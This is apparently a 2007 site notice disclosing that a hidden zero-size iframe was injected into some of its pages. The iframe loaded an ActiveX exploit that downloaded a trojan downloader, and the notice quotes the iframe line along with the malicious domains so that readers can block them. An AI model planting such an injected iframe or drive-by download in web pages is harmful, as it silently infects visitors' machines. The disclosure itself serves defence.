picts-XXXX.zip and imageXX.zip
Hent.zip spams spreading
We are very sorry that when sometimes visiting our some pages, malicious codes are inserted. We think it doesn't mean that our website has been compromised. It's maybe due to ARP attack. We have informed our webserver provider to help us check whether it's due to ARP attack or not.
The malicious codes are inserted into the top of some pages.
This link is taken the use of the vulnerability of BaoFeng Storm MPS ActiveX. A file "sms.exe" will be downloaded from this domain, the size is 37,888 bytes, Kaspersky detects it as Trojan-Downloader.Win32.Baser.w.
This trojan-downloader can download 20 trojans from ganbibi.com.
We suggest everyone could block this two domains "nmmmn.com","ganbibi.com".
Last modified by smallmo onOctober 2, 2007 15:54
The malicious codes are inserted into the top of some pages.
<iframe src=http://mms.nmmmn.com/<removed>.htm width=0 height=0 frameborder=0></iframe>
This link is taken the use of the vulnerability of BaoFeng Storm MPS ActiveX. A file "sms.exe" will be downloaded from this domain, the size is 37,888 bytes, Kaspersky detects it as Trojan-Downloader.Win32.Baser.w.
This trojan-downloader can download 20 trojans from ganbibi.com.
We suggest everyone could block this two domains "nmmmn.com","ganbibi.com".
Last modified by smallmo onOctober 2, 2007 15:54
Noname Says :
October 5, 2007 07:13
http://en.wikipedia.org/wiki/ARP_spoofing
Pages: 1/1 
1 
1
